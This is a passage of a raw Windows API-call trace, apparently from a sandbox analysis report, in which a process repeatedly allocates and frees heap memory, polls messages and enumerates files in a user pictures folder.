lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0247.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0247.103] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0247.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0247.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0247.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0247.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0247.103] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x917da530, ftCreationTime.dwHighDateTime=0x1d5e2bb, ftLastAccessTime.dwLowDateTime=0x59405080, ftLastAccessTime.dwHighDateTime=0x1d5ec9f, ftLastWriteTime.dwLowDateTime=0x59405080, ftLastWriteTime.dwHighDateTime=0x1d5ec9f, nFileSizeHigh=0x0, nFileSizeLow=0x48e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="BspkZBQYHi.bmp", cAlternateFileName="BSPKZB~1.BMP")) returned 1 [0247.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0247.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0247.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0247.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0247.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0247.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0247.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54828 | out: hHeap=0x970000) returned 1 [0247.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0247.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0247.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0247.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0247.103] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0247.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0247.103] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0247.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0247.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0247.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0247.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0247.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0247.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0247.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0247.104] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0247.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0247.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0247.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0247.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0247.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0247.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0247.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0247.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0247.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0247.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0247.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0247.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0247.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0247.104] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0247.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0247.104] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0247.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0247.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0247.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0247.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0247.104] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4543, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Camera Roll", cAlternateFileName="CAMERA~1")) returned 1 [0247.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0247.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0247.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0247.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0247.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0247.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0247.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545d0 | out: hHeap=0x970000) returned 1 [0247.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0247.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0247.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0247.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0247.105] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0247.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0247.105] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0247.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0247.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0247.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0247.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0247.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0247.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0247.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0247.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0247.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b30 [0247.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c20 [0247.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0247.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0247.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0247.105] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0247.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0247.106] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0247.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0247.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0247.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0247.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0247.106] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389ada20, ftCreationTime.dwHighDateTime=0x1d5e37c, ftLastAccessTime.dwLowDateTime=0x30250f60, ftLastAccessTime.dwHighDateTime=0x1d5e83a, ftLastWriteTime.dwLowDateTime=0x30250f60, ftLastWriteTime.dwHighDateTime=0x1d5e83a, nFileSizeHigh=0x0, nFileSizeLow=0x15327, dwReserved0=0x0, dwReserved1=0x0, cFileName="d6Gq.jpg", cAlternateFileName="")) returned 1 [0247.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0247.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0247.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0247.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0247.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0247.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0247.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0247.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0247.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0247.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0247.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0247.106] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0247.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0247.106] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0247.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0247.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0247.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0247.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0247.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0247.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0247.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0247.107] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0247.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0247.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0247.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0247.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0247.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0247.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0247.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0247.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0247.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0247.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0247.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x978490 [0247.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0247.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0247.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0247.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0247.107] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0247.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0247.107] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0247.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0247.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0247.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0247.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0247.107] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44053085, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44053085, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0247.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0247.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0247.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0247.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0247.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0247.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0247.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54828 | out: hHeap=0x970000) returned 1 [0247.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0247.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0247.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0247.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0247.108] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0247.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0247.239] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0247.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0247.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0247.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0247.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0247.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0247.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0247.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0247.239] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0247.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0247.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0247.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0247.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0247.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0247.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0247.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0247.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0247.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0247.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0247.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54800 | out: hHeap=0x970000) returned 1 [0247.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0247.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0247.240] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0247.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0247.240] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0247.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0247.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0247.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0247.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0247.240] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd594b40, ftCreationTime.dwHighDateTime=0x1d5eb04, ftLastAccessTime.dwLowDateTime=0xccd26e00, ftLastAccessTime.dwHighDateTime=0x1d5ed5a, ftLastWriteTime.dwLowDateTime=0xccd26e00, ftLastWriteTime.dwHighDateTime=0x1d5ed5a, nFileSizeHigh=0x0, nFileSizeLow=0x9006, dwReserved0=0x0, dwReserved1=0x0, cFileName="k1wdGB_YAwU14UY.bmp", cAlternateFileName="K1WDGB~1.BMP")) returned 1 [0247.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0247.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0247.240] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0247.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0247.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0247.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0247.240] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0247.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0247.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0247.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0247.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0247.241] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0247.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0247.241] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0247.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0247.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0247.241] RtlAllocateHeap 